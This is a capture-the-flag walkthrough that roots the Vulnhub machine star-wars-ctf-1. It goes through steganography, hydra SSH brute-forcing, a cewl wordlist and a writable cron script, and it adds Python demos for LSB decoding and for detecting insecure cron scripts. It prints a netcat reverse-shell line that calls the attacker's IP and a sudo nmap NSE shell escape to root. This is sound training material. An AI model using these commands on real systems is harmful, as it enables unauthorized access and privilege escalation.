Hi friends, today I am going to share a writeup for gaining root access on the Vulnhub machine “star-wars-ctf-1”. It contains one flag, which is accessible only after gaining root-level privileges on the machine. It was developed by the Sir Logic team, and its difficulty level is beginner. Our goal is to gain a root shell.

Download it from here: https://www.vulnhub.com/entry/star-wars-ctf-1,528/

Table of Contents:

Reconnaissance

netdiscover

Nmap

Dirb

Steganography Online decrypt tool

Exploitation

hydra

SSH Login

Privilege Escalation

Post Enumeration

Abusing writeable script

Root access

WalkThrough

Reconnaissance

Let’s start reconnaissance of the vulnerable machine with netdiscover, which identifies the IP addresses of the devices on our network.

netdiscover

Having identified the target IP address (192.168.0.188), we run nmap for port scanning and further information gathering on the host. Here “-A” enables aggressive scanning, which combines OS detection, version detection, default script scanning and traceroute.

nmap -A 192.168.0.188

From the results we learn that only two ports are open: SSH and HTTP.

Since port 80 is open, let’s open the web page hosted on the target IP in a browser.

Our next goal is a password, so we inspect the source code of the web page.

The author left a hint, “password is here”, next to text that looks like base64. We tried to decode it but could not get anything meaningful out of it; I think the author wants to bluff us into decoding it. So instead we downloaded the image from the main page to look for text hidden inside it, a technique known as steganography.

To check for that, open https://stylesuxx.github.io/steganography/, upload the image, and use the Decode option to extract the hidden text.
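The browser tool above hides text in the least-significant bits of the image’s pixels. To make that concrete, here is an added example (not from the original writeup, and not the stylesuxx tool’s own code) that embeds and then extracts a message with LSB steganography in plain Python. It works on a constructed list of RGB pixels instead of a real PNG, and the 4-byte length header and R,G,B channel order are our own choices; the exact bit layout of any particular online tool is an assumption, so this will not decode that tool’s files byte-for-byte. It also shows the two failure cases a practitioner hits: a cover with no payload (the header reads zero) and a cover too small for the message.

```python
# Added example, not from the original writeup: generic least-significant-bit
# (LSB) image steganography, the family of technique the online decoder uses.
# The 4-byte length header and R,G,B channel order are our own choices; a
# real tool's layout may differ, so this will not decode its files directly.
from typing import Iterator, List, Tuple

Pixel = Tuple[int, int, int]


def _bits(data: bytes) -> Iterator[int]:
    """Yield the bits of data, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def lsb_embed(pixels: List[Pixel], message: bytes) -> List[Pixel]:
    """Hide message in the lowest bit of each colour channel, in pixel order.

    The payload is a 4-byte big-endian length followed by the message, so the
    extractor knows where to stop. Every channel value changes by at most 1,
    which is why the picture looks unchanged to the eye.
    """
    payload = len(message).to_bytes(4, "big") + message
    capacity = len(pixels) * 3  # one bit per channel
    if len(payload) * 8 > capacity:
        raise ValueError(f"payload needs {len(payload) * 8} bits, cover holds {capacity}")
    bit_iter = _bits(payload)
    stego: List[Pixel] = []
    for pixel in pixels:
        channels = []
        for value in pixel:
            bit = next(bit_iter, None)
            channels.append(value if bit is None else (value & 0xFE) | bit)
        stego.append((channels[0], channels[1], channels[2]))
    return stego


def lsb_extract(pixels: List[Pixel]) -> bytes:
    """Recover a message written by lsb_embed; b"" if the header says length 0."""
    if len(pixels) * 3 < 32:
        raise ValueError("image too small to hold the 4-byte header")
    low_bits = (value & 1 for pixel in pixels for value in pixel)

    def read_bytes(count: int) -> bytes:
        out = bytearray()
        for _ in range(count):
            byte = 0
            for _ in range(8):
                byte = (byte << 1) | next(low_bits)
            out.append(byte)
        return bytes(out)

    length = int.from_bytes(read_bytes(4), "big")
    if (length + 4) * 8 > len(pixels) * 3:
        raise ValueError("length header exceeds image capacity: no valid payload")
    return read_bytes(length)


def max_channel_delta(a: List[Pixel], b: List[Pixel]) -> int:
    """Largest per-channel difference between two pixel lists."""
    return max(abs(x - y) for pa, pb in zip(a, b) for x, y in zip(pa, pb))


# Constructed 8x8 cover "image": 64 RGB pixels, i.e. 192 hideable bits.
COVER: List[Pixel] = [(x * 32, y * 32, (x + y) * 16) for y in range(8) for x in range(8)]


def demo() -> bytes:
    """Embed the password recovered in the writeup, then extract it again."""
    stego = lsb_embed(COVER, b"babyYoda123")
    return lsb_extract(stego)


if __name__ == "__main__":
    print(demo())
```

Because every channel value in the constructed cover is even, extracting from the untouched cover yields a zero-length header and an empty message, which is the “nothing hidden here” result you get from a decoy file like the base64 string on the page.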

Decoding the image gives us the password “babyYoda123”, but we don’t know the username yet, so we use dirb to brute-force web directories and enumerate what else the server hosts.

dirb http://192.168.0.188

It lists a few directories, but the robots.txt file is the one that interests me.

Navigating to http://192.168.0.188/robots.txt reveals a path named “/r2d2”, but we still need to enumerate a username.

Since no username turned up, we ran dirb again, this time looking for files with .php, .js and .txt extensions.

dirb http://192.168.0.188/ -X .php,.js,.txt

In its results, user.js looks interesting, so let’s look at it.

Opening user.js in the browser shows two entries that could be usernames: skywalker and han.

With two candidate usernames and one password, we can test them against SSH with hydra. We put both names in users.txt and try the single password babyYoda123 to find which account it belongs to.

hydra -L users.txt -p babyYoda123 192.168.0.188 ssh

Hydra reports one valid SSH login: username han with password babyYoda123.

After logging in over SSH we enumerate the system and find a hidden directory named .secrets containing a text file, note.txt. The note is a hint: the author wants us to build a wordlist with cewl.

ssh han@192.168.0.188
ls -la
cd .secrets
ls -la
cat note.txt

Next we check /etc/passwd to enumerate user accounts and see han, skywalker and Darth.

tail /etc/passwd

Earlier, robots.txt pointed us at /r2d2. Opening it in the browser gives the page shown in the image.

Recall the cewl hint from note.txt. We used cewl to build a wordlist, dict.txt, from the words on the /r2d2 page and fed it to hydra as the password list for an SSH brute-force against the user skywalker.

cewl http://192.168.0.188/r2d2 > dict.txt
hydra -l skywalker -P dict.txt 192.168.0.188 ssh

As we can see, hydra finds a valid password for skywalker.
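cewl works by spidering a site and collecting the words from its pages, on the theory that people pick passwords from their own content. As an added example (not from the writeup and not cewl’s own code), here is a minimal cewl-style wordlist generator in Python: it takes page HTML directly instead of fetching it, skips script and style blocks, keeps cewl’s default minimum word length of 3, and preserves first-seen order so the most prominent words are tried first. The HTML below is a constructed stand-in for the /r2d2 page, not its real content.

```python
# Added example, not from the original writeup: a minimal cewl-style wordlist
# generator that works on HTML text (no network access needed).
import re
from html.parser import HTMLParser
from typing import List


class _TextExtractor(HTMLParser):
    """Collect visible text, skipping the contents of <script> and <style>."""

    def __init__(self) -> None:
        super().__init__()
        self.chunks: List[str] = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def cewl_words(html: str, min_length: int = 3, lowercase: bool = False) -> List[str]:
    """Return unique alphanumeric words from the page text, in first-seen order.

    min_length=3 mirrors cewl's default; lowercase=True folds case the way
    cewl's --lowercase option does, which shrinks the list for hydra.
    """
    parser = _TextExtractor()
    parser.feed(html)
    text = " ".join(parser.chunks)
    seen = set()
    words: List[str] = []
    for word in re.findall(r"[A-Za-z0-9]+", text):
        if len(word) < min_length:
            continue
        if lowercase:
            word = word.lower()
        if word not in seen:
            seen.add(word)
            words.append(word)
    return words


# Constructed stand-in for the /r2d2 page; the real page content is not reproduced here.
SAMPLE_HTML = """<html><head><title>R2D2</title>
<style>body { color: red; }</style></head>
<body><h1>Beep boop</h1>
<p>R2D2 is an astromech droid. Skywalker trusts R2D2 in every mission.</p>
<script>var x = "secretjs";</script>
</body></html>"""


if __name__ == "__main__":
    # One word per line is exactly the format hydra -P expects.
    print("\n".join(cewl_words(SAMPLE_HTML)))
```

Redirect the output to a file and pass it to hydra with -P, just as the writeup does with dict.txt. Note that words inside script and style blocks never reach the list, which matches what a user actually sees on the page.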

Now we switch from han to skywalker and continue enumerating.

su skywalker
ls -la
cd .secrets
ls -la

In skywalker’s home directory we again find a hidden .secrets directory with a note.txt. This note reads “Darth must take up the job of being a good father”, which suggests that Darth is the next user to target.

Moving back to /home, we find a Darth directory that contains a hidden .secrets directory with a Python file, evil.py. As the image shows, the file is readable, writable and executable, and it is run automatically every minute. A script that runs on a schedule as another user, yet is writable by us, is a direct path to that user’s privileges.
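Here is the check an attacker or a defender would run to find this condition, as an added example that is not part of the writeup: parse a crontab, pull out the script paths it executes, and flag any that group or world can write. The crontab text is constructed for the demo and the two scripts are created in a temporary directory; the only real system paths it touches are /bin/sh and /usr/bin/python3, which are merely stat’ed. The user names in the constructed table are the machine’s users from the writeup.

```python
# Added example, not from the original writeup: find scripts that a cron table
# runs but that other users can modify (the weakness behind evil.py above).
import os
import re
import stat
import tempfile
from typing import Dict, List

# An absolute path token: starts with "/" and is preceded by whitespace or
# line start, so "*/5" in a schedule field is not picked up.
PATH_TOKEN = re.compile(r"(?<!\S)(/[^\s;&|]+)")


def cron_script_paths(crontab: str) -> List[str]:
    """Return the absolute paths referenced by the commands in a crontab.

    Comment lines and environment assignments (SHELL=..., PATH=...) are
    skipped. Both /etc/crontab style (with a user field) and per-user
    crontab lines work, because we only look for path-like tokens.
    """
    paths: List[str] = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        for path in PATH_TOKEN.findall(line):
            if path not in paths:
                paths.append(path)
    return paths


def writable_by_others(path: str) -> bool:
    """True if the group- or world-writable bit is set on an existing file."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_writable_cron_scripts(crontab: str) -> Dict[str, bool]:
    """Map every path the crontab runs to whether others can write it."""
    return {p: writable_by_others(p) for p in cron_script_paths(crontab)}


def demo() -> Dict[str, bool]:
    """Create a 0644 and a 0666 script in a temp dir and check a constructed crontab."""
    with tempfile.TemporaryDirectory() as workdir:
        safe = os.path.join(workdir, "backup.sh")
        loose = os.path.join(workdir, "evil.py")
        for path, mode in ((safe, 0o644), (loose, 0o666)):
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        # Constructed /etc/crontab-style table: users from the writeup,
        # paths pointing at the temp files created above.
        crontab = (
            "SHELL=/bin/sh\n"
            "PATH=/usr/local/bin:/usr/bin:/bin\n"
            "# m h dom mon dow user command\n"
            f"0 2 * * * root /bin/sh {safe}\n"
            f"* * * * * Darth /usr/bin/python3 {loose}\n"
        )
        return find_writable_cron_scripts(crontab)


if __name__ == "__main__":
    for path, writable in demo().items():
        print(("WRITABLE  " if writable else "ok        ") + path)
```

On a real target, feed it the contents of /etc/crontab and the files under /etc/cron.d, and remember that the interpreter path (here /usr/bin/python3) is checked too: a writable interpreter is just as good a hijack as a writable script.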

Privilege Escalation

Since evil.py is writable, we edit it so that its next scheduled run gives us a reverse shell as Darth over netcat. Note that this relies on the target’s netcat supporting -e; the OpenBSD variant of nc does not, in which case a bash /dev/tcp or Python reverse shell serves the same purpose.

nano evil.py

# new contents of evil.py; 192.168.0.147 is our attacking machine
import os
os.system("nc -e /bin/bash 192.168.0.147 1234")

In a new terminal on the attacking machine, we start a netcat listener and wait for the scheduled run to connect back.

nc -lvp 1234

After about a minute we get a session as Darth. We upgrade it to a proper TTY with a Python one-liner and then check Darth’s sudo privileges.

python -c 'import pty; pty.spawn("/bin/bash")'
sudo -l

We find that Darth may run nmap via sudo. Nmap’s --script option executes Lua NSE scripts, so without wasting time we write a one-line script in /tmp that spawns a shell and run it through sudo nmap to escalate to root.

echo 'os.execute("/bin/sh")' > /tmp/root.nse
sudo nmap --script=/tmp/root.nse
id
cd /root
cat flag.txt

Boom! We have completed the task and obtained the final flag of the machine.

Author: Madhava Rao Yejarla is an Ethical Hacker, Security Analyst, Penetration Tester from India. Contact on LinkedIn or Twitter